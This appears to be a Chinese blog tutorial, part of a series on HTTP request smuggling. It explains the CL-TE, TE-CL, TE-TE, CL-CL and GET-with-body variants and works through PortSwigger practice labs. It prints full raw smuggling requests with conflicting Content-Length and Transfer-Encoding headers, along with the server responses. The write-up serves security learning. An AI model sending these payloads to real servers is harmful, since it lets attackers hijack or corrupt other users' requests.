http走私漏洞學習（1）--http走私簡介
http走私漏洞學習（2）--http走私常見方法
http走私漏洞學習（3）--http走私漏洞利用

0x00 CL-TE

CL-TE，是指前端遵循Content-Length請求頭，而后端遵循RFC2616規(guī)定，忽略Content-Length請求頭，而去處理Transfer-Encoding請求頭。

實驗靶場：https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

進入靶場抓包，修改為POST請求方式，關(guān)閉burp suite自動更新Content-Length功能

修改數(shù)據(jù)包，添加 Transfer-Encoding: chunked，修改數(shù)據(jù)包Content-Length的值

POST / HTTP/1.1
Host: ac281f8a1ece4f1980d61fb7000a00d0.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=E4Rwvo7mdvUM2W9694zcELGHntk1EJGk
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO

接著提交，返回正常

再次提交，提示："Unrecognized method HELLOPOST"

發(fā)現(xiàn)HELLO成為了走私數(shù)據(jù)拼接到了另一個數(shù)據(jù)包，數(shù)據(jù)包變成了

HELLOPOST / HTTP/1.1
....

0x01 TE-CL

TE-CL，當前端處理Transfer-Encoding請求頭，而后端處理Content-Length產(chǎn)生。前端讀取至0\r\n\r\n，后端讀取Content-Length長度，后續(xù)數(shù)據(jù)被認為是下一個請求。

實驗靶場：https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
提交數(shù)據(jù)包如下：

POST / HTTP/1.1
Host: ac9f1f681f95468d8013337c004200de.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: session=kAEmhKyFvWinLjDltGl7olFUN0EE6ZBp
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

提交一次該數(shù)據(jù)包后，再提交正常數(shù)據(jù)包，提示‘Unrecognized method GPOST’

0x02 TE-TE

TE-TE，數(shù)據(jù)包存在兩個Transfer-Encoding，當前端服務(wù)器處理第一個TE，而后端服務(wù)器處理第二個Transfer-Encoding，造成走私。

實驗靶場：https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
提交數(shù)據(jù)包如下

POST / HTTP/1.1
Host: accc1f301e16349d8090a8f30091009b.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=oWRjwBUx5SdT8KI9EiUUgiM4b8bBBSdK
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

提交一次該數(shù)據(jù)包后，再提交正常數(shù)據(jù)包，提示‘Unrecognized method GPOST’

0x03 CL-CL

CL-CL，根據(jù)RFC7230的規(guī)范中，服務(wù)器接收兩個Content-Length且兩者值不同時，需要返回400錯誤。如果服務(wù)器不遵守規(guī)范，前端服務(wù)器讀取第一個CL，而后端服務(wù)器讀取了第二個CL，便造成了走私。
如：

POST / HTTP/1.1
Host: xxx.com
Content-Length:5
Content-Length:4

hello

余下的‘o’為被當成正常請求，將被拼接到下一個請求中

CL!=0

CL不為0，當前端服務(wù)器允許GET請求攜帶請求體，而后端服務(wù)器不允許攜帶請求體，后端會忽略掉GET請求中的Content-Length頭，可能會導(dǎo)致請求走私。

GET / HTTP/1.1
Host: xxx.com
Content-Length: 33

GET / HTTP/1.1
Host: xxx.com

由于Pipeline存在，后端服務(wù)器忽略了CL后，可能會認為受到了兩個數(shù)據(jù)包。